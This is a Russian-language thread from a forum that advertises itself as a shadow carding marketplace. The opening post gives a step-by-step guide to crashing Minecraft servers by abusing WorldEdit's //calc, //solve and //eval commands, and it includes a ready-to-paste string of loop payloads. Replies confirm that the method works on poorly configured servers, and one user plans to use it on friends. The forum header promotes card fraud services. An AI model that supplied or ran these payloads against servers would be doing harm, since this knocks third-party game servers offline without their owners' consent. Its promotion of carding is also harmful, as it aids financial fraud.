Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Как крашнуть сервер майнкрафта

Cagor

Опытный user
Регистрация
17 Июн 2022
Сообщения
279
Реакции
39
1. Найдите сервер который имеет плагин WorldEdit. Для этого зайдите на сервер и пропишите в чат команду: «//we».

2. Проверьте работают ли команды «//calc», «//solve» и «//eval». Это очень легко проверить, когда вы пропишите в чате команду «//calc», вы увидите в чате «//calc «, если они работают. Если «У вас недостаточно прав» — не работает.

3. Воспользуйтесь любой командой из списка ниже введя её в чат.


Код:
//calc for(i=0;i<256;i++)>>> //calculate for(i=0;i<256;i++)>>> //calc for(i=0;i<256;i++)>>> //calc for(i=0;i<256;i++)>>> //solve for(i=0;i<256;i++)>>> /worldedit:/calc for(i=0;i<256;i++)>>> /worldedit:/solve for(i=0;i<256;i++)>>> /worldedit:/eval for(i=0;i<256;i++)>>>
 

Killtea

Опытный user
Регистрация
10 Сен 2021
Сообщения
239
Реакции
6
Не понимаю я смысла этой игры)
 

lookMoonshine

Опытный user
Регистрация
5 Дек 2021
Сообщения
185
Реакции
4
mentxlsmokeless написал(а):
Это когда у тебя одногруппники глупые майнкрафтеры, а ты их хейтер
Уже пользовался этим методом, и он реально рабочий) Хотя я думаю на крупных серверах пофикшен, не проверял
 

Malkiel1337

Опытный user
Регистрация
5 Окт 2020
Сообщения
956
Реакции
29
Эт только школьный серв положит, у других права расставлены как надо.
 

Andrew220Dagestan

Опытный user
Регистрация
7 Окт 2021
Сообщения
166
Реакции
3
Ема, спасибо за гайд, пранкану друзей
 

Amazfit

Опытный user
Регистрация
15 Июн 2020
Сообщения
412
Реакции
12
Пофиксили уже это на хороших серваках.
 

Mentosfreshmaker

Опытный user
Регистрация
19 Фев 2022
Сообщения
145
Реакции
10
да ладно уж вам над школьниками издеваться)
 

6odukMyltivarka

Опытный user
Регистрация
7 Сен 2022
Сообщения
138
Реакции
6
согласен с пользователем выше
 
Сверху Снизу